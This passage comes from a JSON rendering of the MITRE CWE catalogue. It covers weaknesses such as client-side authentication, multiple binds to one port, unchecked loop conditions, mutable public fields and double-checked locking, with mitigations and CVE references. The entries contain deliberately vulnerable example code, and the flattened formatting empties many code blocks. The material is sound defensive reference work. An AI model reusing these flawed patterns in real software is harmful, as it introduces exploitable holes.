\\"success\\") {}else {}","xhtml:br":["","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"writeSocket($sock, \\"CHANGE-ADDRESS $username $address\\\\n\\";","xhtml:br":["",""],"xhtml:i":"# username/pass is valid, go ahead and update the info!"}},{"#text":"print \\"ERROR: Invalid Authentication!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"$sock = acceptSocket(1234);($cmd, $args) = ParseClientRequest($sock);if ($cmd eq \\"AUTH\\") {}elsif ($cmd eq \\"CHANGE-ADDRESS\\") {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"($username, $pass) = split(/\\\\s+/, $args, 2);$result = AuthenticateUser($username, $pass);writeSocket($sock, \\"$result\\\\n\\");","xhtml:br":["","","","","",""],"xhtml:i":["# does not close the socket on failure; assumes the","# user will try again"]}},{"#text":"if (validateAddress($args)) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"$res = UpdateDatabaseRecord($username, \\"address\\", $args);writeSocket($sock, \\"SUCCESS\\\\n\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"writeSocket($sock, \\"FAILURE -- address is malformed\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}]}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-6994","Description":"ASP program allows upload of .asp files by bypassing client-side checks.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6994"},{"Reference":"CVE-2007-0163","Description":"steganography products embed password information in the carrier file, which can be extracted from a modified client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0163"},{"Reference":"CVE-2007-0164","Description":"steganography products embed password information in the carrier file, which can be extracted from a modified client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0164"},{"Reference":"CVE-2007-0100","Description":"client allows server to modify client\'s configuration and overwrite arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0100"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"162"}},{"attr":{"@_CAPEC_ID":"202"}},{"attr":{"@_CAPEC_ID":"207"}},{"attr":{"@_CAPEC_ID":"208"}},{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"383"}},{"attr":{"@_CAPEC_ID":"384"}},{"attr":{"@_CAPEC_ID":"385"}},{"attr":{"@_CAPEC_ID":"386"}},{"attr":{"@_CAPEC_ID":"387"}},{"attr":{"@_CAPEC_ID":"388"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 23, "Client-Side Security Is an Oxymoron" Page 687"}}},"Notes":{"Note":{"#text":"Server-side enforcement of client-side security is conceptually likely to occur, but some architectures might have these strong dependencies as part of legitimate behavior, such as thin clients.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2007-05-07","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Research_Gaps, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":[{"#text":"Client-Side Enforcement of Server-Side Security","attr":{"@_Date":"2008-04-11"}},{"#text":"Design Principle Violation: Client-Side Enforcement of Server-Side Security","attr":{"@_Date":"2009-01-12"}}]}},"603":{"attr":{"@_ID":"603","@_Name":"Use of Client-Side Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A client/server product performs authentication within client code but not in server code, allowing server-side authentication to be bypassed via a modified client that omits the authentication check.","Extended_Description":"Client-side authentication is extremely weak and may be breached easily. Any attacker may read the source code and reverse-engineer the authentication mechanism to access parts of the application which would otherwise be protected.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"602","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"300","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"656","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Do not rely on client side data. Always perform server side authentication."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-0230","Description":"Client-side check for a password allows access to a server using crafted XML requests from a modified client.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0230"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Untrustworthy Credentials", Page 37"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Maintenance_Notes, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Relationships"}],"Previous_Entry_Name":{"#text":"Client-Side Authentication","attr":{"@_Date":"2008-04-11"}}}},"605":{"attr":{"@_ID":"605","@_Name":"Multiple Binds to the Same Port","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"When multiple sockets are allowed to bind to the same port, other services on that port may be stolen or spoofed.","Extended_Description":"On most systems, a combination of setting the SO_REUSEADDR socket option, and a call to bind() allows any process to bind to a port to which a previous process has bound with INADDR_ANY. This allows a user to bind to the specific address of a server bound to INADDR_ANY on an unprivileged port, and steal its UDP packets/TCP connection.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"675","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"666","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":"Read Application Data","Note":"Packets from a variety of network services may be stolen or the services spoofed."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Policy","Description":"Restrict server socket address to known local addresses."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code binds a server socket to port 21, allowing the server to listen for traffic on that port.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void bind_socket(void) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int server_sockfd;int server_len;struct sockaddr_in server_address;unlink(\\"server_socket\\");server_sockfd = socket(AF_INET, SOCK_STREAM, 0);server_address.sin_family = AF_INET;server_address.sin_port = 21;server_address.sin_addr.s_addr = htonl(INADDR_ANY);server_len = sizeof(struct sockaddr_in);bind(server_sockfd, (struct sockaddr *) &s1, server_len);","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":"/*unlink the socket if already bound to avoid an error when bind() is called*/"}}}},"Body_Text":"This code may result in two servers binding a socket to same port, thus receiving each other\'s traffic. This could be used by an attacker to steal packets meant for another process, such as a secure FTP server."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP32","Entry_Name":"Multiple binds to the same port"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Enabling_Factors_for_Exploitation, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"}],"Previous_Entry_Name":{"#text":"Multiple Binds to Same Port","attr":{"@_Date":"2008-04-11"}}}},"606":{"attr":{"@_ID":"606","@_Name":"Unchecked Input for Loop Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly check inputs that are used for loop conditions, potentially leading to a denial of service or other consequences because of excessive looping.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"834","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Do not use user-controlled data for loop conditions."},{"Phase":"Implementation","Description":"Perform input validation."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void iterate(int n){}void iterateFoo(){}","xhtml:div":[{"#text":"int i;for (i = 0; i < n; i++){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"foo();","attr":{"@_style":"margin-left:10px;"}}},{"#text":"unsigned int num;scanf(\\"%u\\",&num);iterate(num);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-91"},"Intro_Text":"In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessageFromSocket(int socket) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE];if (getMessage(socket, buffer, BUFFER_SIZE) > 0) {}return success;","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get message from socket and store into buffer","//Ignoring possibliity that buffer > BUFFER_SIZE"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ExMessage *msg = recastBuffer(buffer);int index;for (index = 0; index < msg->msgLength; index++) {}message[index] = \'\\\\0\';success = processMessage(message);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// place contents of the buffer into message structure","// copy message body into string for processing","// process message"],"xhtml:div":{"#text":"message[index] = msg->msgBody[index];","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Body_Text":"However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130)."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-606"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, "Looping Constructs", Page 327"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-606"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"607":{"attr":{"@_ID":"607","@_Name":"Public Static Final Field References Mutable Object","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A public or protected static final field references a mutable object, which allows the object to be changed by malicious code, or accidentally from another package.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"471","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Protect mutable objects by making them private. Restrict access to the getter and setter as well."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Here, an array (which is inherently mutable) is labeled public static final.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"public static final String[] USER_ROLES;"}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"608":{"attr":{"@_ID":"608","@_Name":"Struts: Non-private Field in ActionForm Class","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An ActionForm class contains a field that has not been declared private, which can be accessed without using a setter or getter.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Modify Application Data","Read Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Make all fields private. Use getter to get the value of the field. Setter should be used only by the framework; setting an action form field from other actions is bad practice and should be avoided."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for a online business site. The user will enter registration data and through the Struts framework the RegistrationForm bean will maintain the user data.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// variables for registration formpublic String name;public String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...}...","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// private variables for registration formprivate String name;private String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...}","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}},{"#text":"// getter and setter methods for private variables...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}],"Body_Text":"However, within the RegistrationForm the member variables for the registration form input data are declared public not private. All member variables within a Struts framework ActionForm class must be declared private to prevent the member variables from being modified without using the getter and setter methods. The following example shows the member variables being declared private and getter and setter methods declared for accessing the member variables."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"609":{"attr":{"@_ID":"609","@_Name":"Double-Checked Locking","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program uses double-checked locking to access a resource without the overhead of explicit synchronization, but the locking is insufficient.","Extended_Description":"Double-checked locking refers to the situation where a programmer checks to see if a resource has been initialized, grabs a lock, checks again to see if the resource has been initialized, and then performs the initialization if it has not occurred yet. This should not be done, as is not guaranteed to work in all languages and on all architectures. In summary, other threads may not be operating inside the synchronous block and are not guaranteed to see the operations execute in the same order as they would appear inside the synchronous block.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"367","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"While double-checked locking can be achieved in some languages, it is inherently flawed in Java before 1.5, and cannot be achieved without compromising platform independence. Before Java 1.5, only use of the synchronized keyword is known to work. Beginning in Java 1.5, use of the \\"volatile\\" keyword allows double-checked locking to work successfully, although there is some debate as to whether it achieves sufficient performance gains. See references."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-70"},"Intro_Text":"It may seem that the following bit of code achieves thread safety while avoiding unnecessary synchronization...","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"if (helper == null) {}return helper;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"synchronized (this) {}","xhtml:div":{"#text":"if (helper == null) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"helper = new Helper();","attr":{"@_style":"margin-left:10px;"}}}}},"xhtml:br":""}},{"attr":{"@_Nature":"bad"},"xhtml:div":"helper = new Helper();"}],"Body_Text":["The programmer wants to guarantee that only one Helper() object is ever allocated, but does not want to pay the cost of synchronization every time this code is called.","Suppose that helper is not initialized. Then, thread A sees that helper==null and enters the synchronized block and begins to execute:","If a second thread, thread B, takes over in the middle of this call and helper has not finished running the constructor, then thread B may make calls on helper while its fields hold incorrect values."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK10-J","Entry_Name":"Do not use incorrect forms of the double-checked locking 